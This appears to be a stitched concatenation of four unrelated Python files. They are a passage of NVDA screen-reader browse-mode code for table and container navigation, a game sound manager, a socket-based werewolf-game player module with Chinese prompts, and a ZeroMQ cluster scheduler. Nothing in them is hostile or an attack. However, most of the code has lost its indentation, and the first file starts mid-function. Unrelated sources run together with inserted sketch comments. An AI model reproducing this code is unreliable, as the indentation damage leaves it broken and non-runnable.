if not scrollInfo.isOverlapping(caretInfo):
if scrollInfo.isCollapsed:
scrollInfo.expand(textInfos.UNIT_LINE)
speech.speakTextInfo(scrollInfo,reason=controlTypes.REASON_CARET)
scrollInfo.collapse()
self.selection = scrollInfo
return True
return False
def _getTableCellCoords(self, info):
if info.isCollapsed:
info = info.copy()
info.expand(textInfos.UNIT_CHARACTER)
for field in reversed(info.getTextWithFields()):
if not (isinstance(field, textInfos.FieldCommand) and field.command == "controlStart"):
# Not a control field.
continue
attrs = field.field
if "table-id" in attrs and "table-rownumber" in attrs:
break
else:
raise LookupError("Not in a table cell")
return (int(attrs["table-id"]),
int(attrs["table-rownumber"]), int(attrs["table-columnnumber"]),
int(attrs.get("table-rowsspanned", 1)), int(attrs.get("table-columnsspanned", 1)))
def _iterTableCells(self, tableID, startPos=None, direction="next", row=None, column=None):
attrs = {"table-id": [str(tableID)]}
# row could be 0.
if row is not None:
attrs["table-rownumber"] = [str(row)]
if column is not None:
attrs["table-columnnumber"] = [str(column)]
results = self._iterNodesByAttribs(attrs, pos=startPos, direction=direction)
if not startPos and not row and not column and direction == "next":
# The first match will be the table itself, so skip it.
next(results)
for item in results:
yield item.textInfo
def _getNearestTableCell(self, tableID, startPos, origRow, origCol, origRowSpan, origColSpan, movement, axis):
if not axis:
# First or last.
if movement == "first":
startPos = None
direction = "next"
elif movement == "last":
startPos = self.makeTextInfo(textInfos.POSITION_LAST)
direction = "previous"
try:
return next(self._iterTableCells(tableID, startPos=startPos, direction=direction))
except StopIteration:
raise LookupError
# Determine destination row and column.
destRow = origRow
destCol = origCol
if axis == "row":
destRow += origRowSpan if movement == "next" else -1
elif axis == "column":
destCol += origColSpan if movement == "next" else -1
if destCol < 1:
# Optimisation: We're definitely at the edge of the column.
raise LookupError
# Optimisation: Try searching for exact destination coordinates.
# This won't work if they are covered by a cell spanning multiple rows/cols, but this won't be true in the majority of cases.
try:
return next(self._iterTableCells(tableID, row=destRow, column=destCol))
except StopIteration:
pass
# Cells are grouped by row, so in most cases, we simply need to search in the right direction.
for info in self._iterTableCells(tableID, direction=movement, startPos=startPos):
_ignore, row, col, rowSpan, colSpan = self._getTableCellCoords(info)
if row <= destRow < row + rowSpan and col <= destCol < col + colSpan:
return info
elif row > destRow and movement == "next":
# Optimisation: We've gone forward past destRow, so we know we won't find the cell.
# We can't reverse this logic when moving backwards because there might be a prior cell on an earlier row which spans multiple rows.
break
if axis == "row" or (axis == "column" and movement == "previous"):
# In most cases, there's nothing more to try.
raise LookupError
else:
# We're moving forward by column.
# In this case, there might be a cell on an earlier row which spans multiple rows.
# Therefore, try searching backwards.
for info in self._iterTableCells(tableID, direction="previous", startPos=startPos):
_ignore, row, col, rowSpan, colSpan = self._getTableCellCoords(info)
if row <= destRow < row + rowSpan and col <= destCol < col + colSpan:
return info
else:
raise LookupError
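	# The search above, restated as a standalone sketch (illustrative only, not
	# part of NVDA's API): given cells as (row, col, rowSpan, colSpan) tuples in
	# document order, the destination cell is any cell whose span covers the
	# destination coordinates.
	#
	#	def findCellCoveringPoint(cells, destRow, destCol):
	#		for row, col, rowSpan, colSpan in cells:
	#			if row <= destRow < row + rowSpan and col <= destCol < col + colSpan:
	#				return (row, col, rowSpan, colSpan)
	#			if row > destRow:
	#				break # cells are grouped by row, so we have gone past the target
	#		raise LookupError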
def _tableMovementScriptHelper(self, movement="next", axis=None):
if isScriptWaiting():
return
formatConfig=config.conf["documentFormatting"].copy()
formatConfig["reportTables"]=True
formatConfig["includeLayoutTables"]=True
try:
tableID, origRow, origCol, origRowSpan, origColSpan = self._getTableCellCoords(self.selection)
except LookupError:
# Translators: The message reported when a user attempts to use a table movement command
# when the cursor is not within a table.
ui.message(_("Not in a table cell"))
return
try:
info = self._getNearestTableCell(tableID, self.selection, origRow, origCol, origRowSpan, origColSpan, movement, axis)
except LookupError:
# Translators: The message reported when a user attempts to use a table movement command
# but the cursor can't be moved in that direction because it is at the edge of the table.
ui.message(_("edge of table"))
# Retrieve the cell on which we started.
info = next(self._iterTableCells(tableID, row=origRow, column=origCol))
speech.speakTextInfo(info,formatConfig=formatConfig,reason=controlTypes.REASON_CARET)
info.collapse()
self.selection = info
def script_nextRow(self, gesture):
self._tableMovementScriptHelper(axis="row", movement="next")
# Translators: the description for the next table row script on virtualBuffers.
script_nextRow.__doc__ = _("moves to the next table row")
def script_previousRow(self, gesture):
self._tableMovementScriptHelper(axis="row", movement="previous")
# Translators: the description for the previous table row script on virtualBuffers.
script_previousRow.__doc__ = _("moves to the previous table row")
def script_nextColumn(self, gesture):
self._tableMovementScriptHelper(axis="column", movement="next")
# Translators: the description for the next table column script on virtualBuffers.
script_nextColumn.__doc__ = _("moves to the next table column")
def script_previousColumn(self, gesture):
self._tableMovementScriptHelper(axis="column", movement="previous")
# Translators: the description for the previous table column script on virtualBuffers.
script_previousColumn.__doc__ = _("moves to the previous table column")
APPLICATION_ROLES = (controlTypes.ROLE_APPLICATION, controlTypes.ROLE_DIALOG)
def _isNVDAObjectInApplication(self, obj):
"""Determine whether a given object is within an application.
The object is considered to be within an application if it or one of its ancestors has an application role.
This should only be called on objects beneath the buffer's root NVDAObject.
@param obj: The object in question.
@type obj: L{NVDAObjects.NVDAObject}
@return: C{True} if L{obj} is within an application, C{False} otherwise.
@rtype: bool
"""
while obj and obj != self.rootNVDAObject:
if obj.role in self.APPLICATION_ROLES:
return True
obj = obj.parent
return False
NOT_LINK_BLOCK_MIN_LEN = 30
def _iterNotLinkBlock(self, direction="next", pos=None):
links = self._iterNodesByType("link", direction=direction, pos=pos)
# We want to compare each link against the next link.
item1 = next(links)
while True:
item2 = next(links)
# If the distance between the links is small, this is probably just a piece of non-link text within a block of links; e.g. an inactive link of a nav bar.
if direction == "next" and item2.textInfo._startOffset - item1.textInfo._endOffset > self.NOT_LINK_BLOCK_MIN_LEN:
yield VirtualBufferQuickNavItem("notLinkBlock",self,0,item1.textInfo._endOffset, item2.textInfo._startOffset)
# If we're moving backwards, the order of the links in the document will be reversed.
elif direction == "previous" and item1.textInfo._startOffset - item2.textInfo._endOffset > self.NOT_LINK_BLOCK_MIN_LEN:
yield VirtualBufferQuickNavItem("notLinkBlock",self,0,item2.textInfo._endOffset, item1.textInfo._startOffset)
item1=item2
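	# The same idea as a standalone sketch (illustrative only): given the sorted
	# (start, end) offsets of every link, yield the gaps between consecutive
	# links that are wider than minLen characters.
	#
	#	def iterGapsBetweenLinks(linkOffsets, minLen=30):
	#		for (start1, end1), (start2, end2) in zip(linkOffsets, linkOffsets[1:]):
	#			if start2 - end1 > minLen:
	#				yield (end1, start2)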
def _getInitialCaretPos(self):
"""Retrieve the initial position of the caret after the buffer has been loaded.
This position, if any, will be passed to L{makeTextInfo}.
Subclasses should extend this method.
@return: The initial position of the caret, C{None} if there isn't one.
@rtype: TextInfo position
"""
if self.shouldRememberCaretPositionAcrossLoads:
try:
return self.rootNVDAObject.appModule._vbufRememberedCaretPositions[self.documentConstantIdentifier]
except KeyError:
pass
return None
def _get_documentConstantIdentifier(self):
"""Get the constant identifier for this document.
This identifier should uniquely identify all instances (not just one instance) of a document for at least the current session of the hosting application.
Generally, the document URL should be used.
@return: The constant identifier for this document, C{None} if there is none.
"""
return None
def _get_shouldRememberCaretPositionAcrossLoads(self):
"""Specifies whether the position of the caret should be remembered when this document is loaded again.
This is useful when the browser remembers the scroll position for the document,
but does not communicate this information via APIs.
The remembered caret position is associated with this document using L{documentConstantIdentifier}.
@return: C{True} if the caret position should be remembered, C{False} if not.
@rtype: bool
"""
docConstId = self.documentConstantIdentifier
# Return True if the URL indicates that this is probably a web browser document.
# We do this check because we don't want to remember caret positions for email messages, etc.
return isinstance(docConstId, basestring) and docConstId.split("://", 1)[0] in ("http", "https", "ftp", "ftps", "file")
def getEnclosingContainerRange(self,range):
formatConfig=config.conf['documentFormatting'].copy()
formatConfig.update({"reportBlockQuotes":True,"reportTables":True,"reportLists":True,"reportFrames":True})
controlFields=[]
for cmd in range.getTextWithFields():
if not isinstance(cmd,textInfos.FieldCommand) or cmd.command!="controlStart":
break
controlFields.append(cmd.field)
containerField=None
while controlFields:
field=controlFields.pop()
if field.getPresentationCategory(controlFields,formatConfig)==field.PRESCAT_CONTAINER:
containerField=field
break
if not containerField: return None
docHandle=int(containerField['controlIdentifier_docHandle'])
ID=int(containerField['controlIdentifier_ID'])
offsets=range._getOffsetsFromFieldIdentifier(docHandle,ID)
return self.makeTextInfo(textInfos.offsets.Offsets(*offsets))
def script_moveToStartOfContainer(self,gesture):
info=self.makeTextInfo(textInfos.POSITION_CARET)
info.expand(textInfos.UNIT_CHARACTER)
container=self.getEnclosingContainerRange(info)
if not container:
# Translators: Reported when the user attempts to move to the start or end of a container (list, table, etc.)
# But there is no container.
ui.message(_("Not in a container"))
return
container.collapse()
self._set_selection(container, reason=browseMode.REASON_QUICKNAV)
if not willSayAllResume(gesture):
container.expand(textInfos.UNIT_LINE)
speech.speakTextInfo(container, reason=controlTypes.REASON_FOCUS)
script_moveToStartOfContainer.resumeSayAllMode=sayAllHandler.CURSOR_CARET
# Translators: Description for the Move to start of container command in browse mode.
script_moveToStartOfContainer.__doc__=_("Moves to the start of the container element, such as a list or table")
def script_movePastEndOfContainer(self,gesture):
info=self.makeTextInfo(textInfos.POSITION_CARET)
info.expand(textInfos.UNIT_CHARACTER)
container=self.getEnclosingContainerRange(info)
if not container:
ui.message(_("Not in a container"))
return
container.collapse(end=True)
if container._startOffset>=container._getStoryLength():
container.move(textInfos.UNIT_CHARACTER,-1)
# Translators: a message reported when:
# Review cursor is at the bottom line of the current navigator object.
# Landing at the end of a browse mode document when trying to jump to the end of the current container.
ui.message(_("bottom"))
self._set_selection(container, reason=browseMode.REASON_QUICKNAV)
if not willSayAllResume(gesture):
container.expand(textInfos.UNIT_LINE)
speech.speakTextInfo(container, reason=controlTypes.REASON_FOCUS)
script_movePastEndOfContainer.resumeSayAllMode=sayAllHandler.CURSOR_CARET
# Translators: Description for the Move past end of container command in browse mode.
script_movePastEndOfContainer.__doc__=_("Moves past the end of the container element, such as a list or table")
@classmethod
def changeNotify(cls, rootDocHandle, rootID):
try:
queueHandler.queueFunction(queueHandler.eventQueue, cls.rootIdentifiers[rootDocHandle, rootID]._handleUpdate)
except KeyError:
pass
def _handleUpdate(self):
"""Handle an update to this buffer.
"""
braille.handler.handleUpdate(self)
def getControlFieldForNVDAObject(self, obj):
docHandle, objId = self.getIdentifierFromNVDAObject(obj)
objId = unicode(objId)
info = self.makeTextInfo(obj)
info.collapse()
info.expand(textInfos.UNIT_CHARACTER)
for item in info.getTextWithFields():
if not isinstance(item, textInfos.FieldCommand) or not item.field:
continue
fieldId = item.field.get("controlIdentifier_ID")
if fieldId == objId:
return item.field
raise LookupError
__gestures = {
"kb:NVDA+d": "activateLongDesc",
"kb:NVDA+f5": "refreshBuffer",
"kb:NVDA+v": "toggleScreenLayout",
"kb:escape": "disablePassThrough",
"kb:alt+upArrow": "collapseOrExpandControl",
"kb:alt+downArrow": "collapseOrExpandControl",
"kb:tab": "tab",
"kb:shift+tab": "shiftTab",
"kb:control+alt+downArrow": "nextRow",
"kb:control+alt+upArrow": "previousRow",
"kb:control+alt+rightArrow": "nextColumn",
"kb:control+alt+leftArrow": "previousColumn",
"kb:shift+,": "moveToStartOfContainer",
"kb:,": "movePastEndOfContainer",
}
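# Illustrative only: a stripped-down sketch of how a gesture map such as
# ``__gestures`` above resolves to a ``script_*`` method. NVDA's real dispatch
# lives in inputCore/baseObject and is considerably more involved; the helper
# below merely demonstrates the naming convention and is not used anywhere.
def _exampleResolveGestureScript(obj, gestureMap, gestureIdentifier):
	scriptName = gestureMap.get(gestureIdentifier)
	if not scriptName:
		return None
	return getattr(obj, "script_%s" % scriptName, None)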
|
sound.py
|
import arcade
from game.constants import *
import time
import threading
class Sound:
def __init__(self):
self.path_sound_list = [FLY_SOUND_EAT,
FLY_SOUND_DEATH,
SPIDER_SOUND_EAT,
SPIDER_SOUND_DEATH,
BIRD_SOUND_EAT,
BIRD_SOUND_DEATH,
CAT_SOUND_EAT,
CAT_SOUND_DEATH,
SHARK_SOUND_EAT,
SHARK_SOUND_DEATH,
GODZILLA_EAT,
GODZILLA_WIN] # This will be merged with Victory
self.sound_list = []
self.poop_death = arcade.load_sound(POOP_DEATH)
self._godzilla_consume_sound = arcade.load_sound(GODZILLA_EAT)
for x in self.path_sound_list:
if x is not None:
# arcade.load_sound(x)
self.sound_list.append(arcade.load_sound(x))
else:
self.sound_list.append(arcade.load_sound(FOO_SOUND))
self.cur_evolution_index = 0
def death(self, evolution):
if evolution == -1:
self._playsound(self.poop_death)
# elif evolution == 7:
# self._playgodzilla_consume()
else:
death_num = evolution * 2 + 1
# print(f"DeathNum: {death_num}")
self._playsound(self.sound_list[death_num])
def consume(self, evolution):
# print(f"Consume evolution num: {evolution}")
self.cur_evolution_index = evolution
thread = threading.Thread(target=self._consume_threading_target)
thread.start()
def _consume_threading_target(self):
time.sleep(CONSUME_DELAY)
        sound_num = self.cur_evolution_index * 2
        # print(f"consume num: {sound_num}")
        self._playsound(self.sound_list[sound_num])
def _playgodzilla_consume(self):
arcade.play_sound(self._godzilla_consume_sound, SOUND_VOLUME)
    def _playsound(self, sound):
        arcade.play_sound(sound, SOUND_VOLUME)
def play_win(self):
sound = arcade.load_sound(VICTORY_SOUND)
arcade.play_sound(sound, SOUND_VOLUME)
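# A minimal sketch of the indexing convention used by Sound above, kept free of
# the arcade dependency (illustrative only): path_sound_list stores eat/death
# pairs, so evolution ``e`` presumably maps to index ``2*e`` for its eat sound
# and ``2*e + 1`` for its death sound.
def _sound_indices(evolution):
    """Return the (eat_index, death_index) pair for an evolution level."""
    return evolution * 2, evolution * 2 + 1

if __name__ == "__main__":
    # With the list order above, evolution 1 (the spider, presumably) would use
    # SPIDER_SOUND_EAT at index 2 and SPIDER_SOUND_DEATH at index 3.
    print(_sound_indices(1))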
|
abstraction.py
|
import socket
from threading import Thread
from typing import Optional, List
from ..WP.api import ChunckedData, ReceiveThread, TimeLock
defaultTimeout: float = 180.0  # timeout in seconds, used as the default argument of the methods below
def default_timeout(timeout=None) -> float:
"""
Get or set the default timeout value.
Parameter:
- float or `None`
* float: set the default timeout value
* `None`: get the default timeout value
Returns:
* float, the value of the default timeout
"""
global defaultTimeout
if timeout is not None and timeout > 0:
defaultTimeout = timeout
return defaultTimeout
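# Example usage of the get-or-set helper above (illustrative):
#   default_timeout(120.0)  # sets the shared default and returns 120.0
#   default_timeout()       # leaves it unchanged and returns the current value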
class Person():
"""
Base class for a player.
Attributes:
id: the identifier of the player.
socket: the outgoing socket for communication with the client
recv: the incoming socket for communication with the client
client: the (ip, port) tuple format of address of the client
server: the (ip, port) tuple format of address of the server
police: bool, whether the player is the police
innocent: bool, whether the player is innocent, this attribute is for the predictor
        alive: bool, whether the player is alive
    Private methods:
        _getBasePacket(): Get a template of the packet
        _startListening(): Listen on the socket and return the receiving thread
Methods:
vote(): Inform the client to vote for the exiled
joinElection(): Ask the client to join the election
voteForPolice(): Inform the client to vote for the police
setPolice(): The result of the vote
speak(): The player communicate with each other in day
onDead(): Perform actions after the player is killed
"""
def __init__(self, id: int, connection: socket.socket):
"""
Initialize the player
Parameters:
id: int, provided by the upper layer
            connection: socket.socket, the accepted connection to the client
        Returns:
            Person, the object created.
"""
        # AF_INET: the TCP/IP (IPv4) protocol family; SOCK_STREAM: a TCP stream socket
self.socket = connection
self.server = self.socket.getsockname()
self.client = self.socket.getpeername()
self.id = id
        self.police = False  # assigned by the server; initialized to False in __init__()
        self.innocent = True  # False if the client is a werewolf, True otherwise
self.alive = True
def _getBasePacket(self) -> dict:
"""
Gets a packet for modification
Parameters:
None
Returns:
dict, containing the IP address and the port of the client and the server.
"""
ret = {}
ret['srcAddr'] = self.server[0]
ret['srcPort'] = self.server[1]
ret['destAddr'] = self.client[0]
ret['destPort'] = self.client[1]
return ret
def _startListening(self, timeout=0) -> ReceiveThread:
"""
Listen to the client for a specified time.
Parameters:
timeout: float, time to wait for the client
Returns:
            ReceiveThread, the thread receiving from the client
"""
        receivingThread = ReceiveThread(self.socket, timeout)
        receivingThread.start()
        return receivingThread
def inform(self, content: str):
packet = self._getBasePacket()
packet['content'] = content
packetSend = ChunckedData(4, **packet)
sendingThread = Thread(target=packetSend.send,
args=(self.socket, ))
sendingThread.setDaemon(True)
sendingThread.start()
def informDeath(self):
packet = self._getBasePacket()
packetSend = ChunckedData(8, **packet)
sendingThread = Thread(
target=packetSend.send, args=(self.socket, ))
sendingThread.setDaemon(True)
sendingThread.start()
def informResult(self, result: bool):
packet = self._getBasePacket()
packet['result'] = result
packetSend = ChunckedData(-8, **packet)
sendingThread = Thread(target=packetSend.send,
args=(self.socket, ))
sendingThread.setDaemon(True)
sendingThread.start()
def vote(self, timeout: float = defaultTimeout) -> ReceiveThread:
"""
Send a package to a player to vote for the exiled.
Parameters:
timeout: float, time to wait for the client
Returns:
ReceiveThread, the thread receiving from the client
"""
packet = self._getBasePacket()
packet['prompt'] = "请投票要执行放逐的玩家:\n"
packet['timeLimit'] = timeout
packetSend = ChunckedData(7, **packet)
sendingThread = Thread(target=packetSend.send,
args=(self.socket, ))
sendingThread.setDaemon(True)
sendingThread.start()
return self._startListening(timeout=timeout)
def joinElection(self, timeout: float = defaultTimeout) -> ReceiveThread:
"""
Send a package to a player to join the police election.
Parameters:
timeout: float, time to wait for the client
Returns:
ReceiveThread, the thread receiving from the client
"""
packet = self._getBasePacket()
packet['format'] = 'bool'
packet['prompt'] = '请所有玩家上警\n你有%d秒的选择时间\n输入True选择上警,输入False选择不上警:\n' % (
int(timeout), )
packet['timeLimit'] = timeout
packet['iskill'] = False
packetSend = ChunckedData(3, **packet)
sendingThread = Thread(target=packetSend.send, args=(self.socket,))
sendingThread.setDaemon(True)
sendingThread.start()
return self._startListening(timeout=timeout)
def policeSetseq(self, timeout: float = defaultTimeout) -> Optional[ReceiveThread]:
"""
        Send a package to the police to choose the speaking sequence.
Parameters:
timeout: float, time to wait for the client
Returns:
receiveThread, the thread receiving from the client
"""
if self.police:
packet = self._getBasePacket()
packet['prompt'] = "请选择玩家发言顺序,True表示顺时针发言,False表示逆时针发言:\n"
packet['timeLimit'] = timeout
packet['iskill'] = False
packet['format'] = "bool"
packetSend = ChunckedData(3, **packet)
sendingThread = Thread(
target=packetSend.send, args=(self.socket, ))
sendingThread.setDaemon(True)
sendingThread.start()
return self._startListening(timeout=timeout)
else:
return None
def setPolice(self, val: bool = True):
"""
Set the player to be the police.
Parameters:
val: bool, whether the player is the police
Returns:
None
"""
self.police = val
def voteForPolice(self, timeout: float = defaultTimeout) -> Optional[ReceiveThread]:
"""
        Send a package to a non-police player to vote for the police.
Parameters:
timeout: float, time to wait for the client
Returns:
receiveThread, the thread receiving from the client
"""
if not self.police:
packet = self._getBasePacket()
packet['prompt'] = "请投票:"
packet['timeLimit'] = timeout
packetSend = ChunckedData(7, **packet)
sendingThread = Thread(
target=packetSend.send, args=(self.socket, ))
sendingThread.setDaemon(True)
sendingThread.start()
return self._startListening(timeout=timeout)
else:
return None
def speak(self, timeout: float = defaultTimeout) -> ReceiveThread:
"""
Send a package to a player to talk about the situation before the vote.
Parameters:
timeout: float, time to wait for the client
Returns:
ReceiveThread, the thread receiving from the client
"""
packet = self._getBasePacket()
packet['timeLimit'] = timeout
packetSend = ChunckedData(6, **packet)
sendingThread = Thread(target=packetSend.send,
args=(self.socket, ))
sendingThread.setDaemon(True)
sendingThread.start()
return self._startListening(timeout=timeout)
# def sendMessage(self, data: list = []):
# packet = self._getBasePacket()
# packet['description'] = '\n'.join(data)
# packet['parameter'] = tuple()
# sendingThread = Thread(target=packetSend.send(), args=(self.socket, ))
# sendingThread.start()
def onDead(self, withFinalWords: bool, timeouts: float):
"""
Called on the death of a player.
Parameters:
withFinalWords: bool, whether the player can talk at death.
            timeouts: float, the time limit for each action.
        Returns:
            a tuple containing the following items:
            ReceiveThread or None: the reply choosing the player who inherits the police badge
            ReceiveThread or None: the final words of the player
"""
self.alive = False
ret = []
if self.police:
packet = self._getBasePacket()
packet['prompt'] = "请选择要继承警徽的玩家:\n"
packet['timeLimit'] = timeouts
packetSend = ChunckedData(7, **packet)
sendingThread = Thread(
target=packetSend.send, args=(self.socket, ))
sendingThread.setDaemon(True)
sendingThread.start()
ret.append(self._startListening(timeout=timeouts))
ret[-1].join()
else:
ret.append(None)
if withFinalWords:
packet = self._getBasePacket()
packet['timeLimit'] = timeouts
packetSend = ChunckedData(6, **packet)
sendingThread = Thread(
target=packetSend.send, args=(self.socket, ))
sendingThread.setDaemon(True)
sendingThread.start()
ret.append(self._startListening(timeout=timeouts))
ret[-1].join()
else:
ret.append(None)
return tuple(ret)
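# A rough sketch (not part of the original module) of how a game server might
# drive one voting round with the Person API above: start a vote() thread for
# every living player, wait for all of them, then gather the raw results.  The
# structure of the returned ChunckedData packets is assumed, so they are
# returned untouched here.
def collect_votes(players: List["Person"], timeout: float = defaultTimeout) -> list:
    pending = [(p, p.vote(timeout=timeout)) for p in players if p.alive]
    for _, receiver in pending:
        receiver.join()
    return [(p.id, receiver.getResult()) for p, receiver in pending]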
class Villager(Person):
"""
Villager, player without any additional skills.
Attributes and methods are inherited from class Person
"""
def __init__(self, id: int, connection: socket.socket):
super().__init__(id, connection)
self.type = 0
class Wolf(Person):
"""
Werewolves, can wake up at night to kill someone.
Attributes:
Some attributes are inherited from class Person without modification
innocent: bool, inherited from class Person, but initialized to False
peerList: list, other wolves in the game
Methods:
Some methods are inherited from class Person without modification
setPeer(): used for the server to add other wolves to the list
removePeer(): used for the server to remove a wolf when it's killed
kill(): ask the client to kill a player
"""
def __init__(self, id: int, connection: socket.socket):
"""
Initialization method inherited from class Person
"""
super().__init__(id, connection)
self.innocent = False
self.type = -1
self.peerList: List[Wolf] = []
def setPeer(self, peer):
"""
Add a wolf to the list
"""
self.peerList.append(peer)
def removePeer(self, peer):
"""
Remove a wolf from the list
"""
self.peerList.remove(peer)
def kill(self, timeout: float = defaultTimeout) -> Optional[ReceiveThread]:
"""
        Wolves communicate with each other and specify the victim
Parameters:
timeout: float, time to wait for the client
Returns:
receiveThread, the thread receiving from the client
"""
packet = self._getBasePacket()
packet['format'] = "int"
packet['prompt'] = "狼人请刀人。\n你有%d秒的时间与同伴交流\n输入任何文本可以与同伴交流,输入数字投票" % (
int(timeout), )
packet['timeLimit'] = timeout
packet['iskill'] = True
packetSend = ChunckedData(3, **packet)
sendingThread = Thread(target=packetSend.send,
args=(self.socket,))
sendingThread.setDaemon(True)
sendingThread.start()
timer = TimeLock(timeout)
timer.setDaemon(True)
timer.start()
recv: Optional[ReceiveThread] = None
recv = self._startListening(timeout)
while not timer.getStatus():
if recv.getResult() is None:
continue
elif recv.getResult().type == -3:
return recv
elif recv.getResult().type == 5:
packet: dict = recv.getResult().content.copy()
recv = self._startListening(timeout)
packet['content'] = "%d号玩家发言:\t" % (
self.id, ) + packet['content']
for peer in self.peerList:
packet.update(**peer._getBasePacket())
packetSend = ChunckedData(5, **packet)
thread = Thread(target=packetSend.send,
args=(peer.socket, ))
thread.setDaemon(True)
thread.start()
return recv
class SkilledPerson(Person):
"""
    Villagers with skills. Some skills can only be used once, while others can be used indefinitely.
    Attributes:
        used: int, the number of times the skill has been used; a non-zero value generally means it is no longer available
    Methods:
        skill(): ask a player to use his ability.
        postSkill(): update the skill usage counter.
"""
def __init__(self, id: int, connection: socket.socket):
"""
Initialization method inherited from class Person
"""
super(SkilledPerson, self).__init__(id, connection)
self.used: int = 0
def postSkill(self, increment=1):
"""
        Increments the used counter of the player
"""
self.used += increment
def skill(self, prompt: str = "", timeout: float = defaultTimeout, format: str = "int") -> ReceiveThread:
"""
Ask the player whether to use the skill
Parameters:
timeout: float, time to wait for the client
format: the accepted parameter type
Returns:
receiveThread, the thread receiving from the client
"""
packet = self._getBasePacket()
packet['format'] = format
packet['prompt'] = prompt
packet['timeLimit'] = timeout
packet['iskill'] = False
packetSend = ChunckedData(3, **packet)
sendingThread = Thread(target=packetSend.send,
args=(self.socket, ))
sendingThread.setDaemon(True)
sendingThread.start()
return self._startListening(timeout)
class KingOfWerewolves(Wolf, SkilledPerson):
"""
King of werewolves, can kill a person when not being poisoned.
Attributes and methods are inherited from class SkilledPerson.
"""
def __init__(self, id: int, connection: socket.socket):
super(KingOfWerewolves, self).__init__(id, connection)
self.type = -3
def skill(self, timeout: float = defaultTimeout):
prompt = """Please select a person to kill.
you have %f seconds to decide.""" % (timeout, )
return SkilledPerson.skill(self, prompt, timeout)
class WhiteWerewolf(Wolf, SkilledPerson):
"""
White werewolf, can kill a person at day.
Attributes and methods are inherited from class SkilledPerson.
"""
def __init__(self, id: int, connection: socket.socket):
super(WhiteWerewolf, self).__init__(id, connection)
self.type = -2
def skill(self, timeout: float = defaultTimeout):
prompt = """请选择在自爆时要杀死的人\n你有%d秒的时间进行决定""" % (int(timeout), )
return SkilledPerson.skill(self, prompt, timeout)
class Predictor(SkilledPerson):
"""
    Predictor, can observe a player's identity at night.
Attributes and methods are inherited from class SkilledPerson.
"""
def __init__(self, id: int, connection: socket.socket):
super(Predictor, self).__init__(id, connection)
self.type = 1
def skill(self, timeout: float = defaultTimeout):
prompt = "请选择你要查验的人\n你有%d秒的时间进行决定" % (int(timeout), )
return SkilledPerson.skill(self, prompt, timeout)
class Witch(SkilledPerson):
"""
Witch, can kill a person or save a person at night.
Attributes and methods are inherited from class SkilledPerson.
"""
def __init__(self, id: int, connection: socket.socket):
super(Witch, self).__init__(id, connection)
self.type = 2
def skill(self, killed: int = 0, timeout: float = defaultTimeout):
packet = self._getBasePacket()
if self.used % 2 == 1:
killed = 0
self.inform("晚上%s玩家死了" % (
str(killed) + "号" if killed else "未知", )
)
if self.used == 0: # Not ever used
prompt = "你有一瓶解药,是否要救%d号玩家;你有一瓶毒药,是否使用\n输入0使用解药,玩家编号使用毒药,-1不使用,你有%d秒时间进行决定\n" % (
killed, int(timeout))
elif self.used == 1: # Saved somebody.
prompt = "你有一瓶毒药,是否使用\n输入玩家编号使用毒药,-1不使用\n你有%d秒的时间进行决定" % (
int(timeout), )
elif self.used == 2: # Killed somebody
prompt = "你有一瓶解药,是否要救%d号玩家\n输入0使用解药,输入-1不使用,你有%d秒时间进行决定\n" % (
killed, int(timeout))
else:
return None
return SkilledPerson.skill(self, prompt, timeout, "int")
class Hunter(SkilledPerson):
"""
Hunter, can kill a person when not being poisoned.
Attributes and methods are inherited from class SkilledPerson.
"""
def __init__(self, id: int, connection: socket.socket):
super(Hunter, self).__init__(id, connection)
self.type = 3
def skill(self, timeout: float = defaultTimeout):
prompt = "请选择你要杀死的玩家,你有%d秒时间进行决定\n" % (int(timeout), )
return SkilledPerson.skill(self, prompt, timeout)
class Guard(SkilledPerson):
"""
Guard, can guard a person to avoid him being killed.
Attributes and methods are inherited from class SkilledPerson.
"""
def __init__(self, id: int, connection: socket.socket):
super(Guard, self).__init__(id, connection)
self.type = 4
def skill(self, timeout: float = defaultTimeout):
prompt = "请选择你要守卫的玩家,你有%d秒时间进行决定\n" % (int(timeout), )
return SkilledPerson.skill(self, prompt, timeout)
class Idiot(SkilledPerson):
"""
    Idiot, avoids dying when being exiled.
Attributes and methods are inherited from class SkilledPerson.
"""
def __init__(self, id: int, connection: socket.socket):
super(Idiot, self).__init__(id, connection)
self.type = 5
def skill(self):
"""
The skill() of class Idiot should not be called outside the class
"""
self.postSkill()
def onDead(self, killedAtNight, withFinalWords, timeouts):
if killedAtNight or self.used:
return super().onDead(withFinalWords, timeouts)
else:
self.skill()
return None
|
scheduler_head.py
|
#!/usr/bin/env python
#-*- encoding: utf-8 -*-
"""
"""
from __future__ import print_function
from __future__ import division
from multiprocessing import Process
import numpy as np
import multiprocessing
import argparse
import psutil
import socket
import time
import tqdm
import sys
import re
import os
import config
#import clusterweb.local.config as config
import base64
import zlib
import cv2
import zmq
from scheduler import Scheduler
"""
===============================================================================
===============================================================================
"""
class WorkerData(object):
def __init__(self,addr=None,port=None,worker_id=None,
resources=None,excl=None,worker_num=None,
worker_addr=None):
self.addr = addr
self.port = port
self.worker_id = worker_id
self.worker_num = worker_num
self.resources = resources
assert isinstance(config.NUM_HEARTBEATS,int)
self.heartbeats = config.NUM_HEARTBEATS
"""
===============================================================================
===============================================================================
"""
# Server
class SchedulerHead(Scheduler):
def __init__(self,
head_addr=config.DEFAULT_HEAD_ADDRESS,
head_port=config.DEFAULT_HEAD_PORT):
super().__init__(head_addr=head_addr,head_port=head_port)
self.head_addr = head_addr
self.head_port = head_port
self.n_workers = 0
self.worker_ips = []
self.worker_ids = []
self.workers_data = {}
self.ports = [self.head_port]
        self.head_socket = self.create_head_socket(self.head_port)
self.handles = {'I':self.init_handle,'H':self.heartbeat_handle}
Process(target=self.heartbeat,args=()).start()
#--------------------------------------------------------------------------
def create_head_socket(self,port):
context = zmq.Context()
head_socket = context.socket(zmq.REP)
        head_socket.bind('tcp://{}:{}'.format('*', port))
return head_socket
#--------------------------------------------------------------------------
def send_job(self,worker_id):
pass
#--------------------------------------------------------------------------
def init_handle(self,worker2head_message):
message = worker2head_message.split(':')
        worker_id = message[1]
        worker_addr = message[2]
if not worker_id in self.worker_ids:
self.n_workers += 1
self.print_log("New worker: {}".format(worker_id))
w = WorkerData(addr=worker_addr,
worker_id=worker_id,
worker_num=self.n_workers)
self.workers_data[worker_id] = w
self.worker_ids.append(worker_id)
head2worker_message = 'I:{}:{}'.format(worker_id,
self.head_port+self.n_workers)
return head2worker_message
#--------------------------------------------------------------------------
def heartbeat_handle(self,message):
message = message.split(':')
worker_id = message[1]
if not worker_id in self.worker_ids:
raise Warning("Unknown worker: {}".format(worker_id))
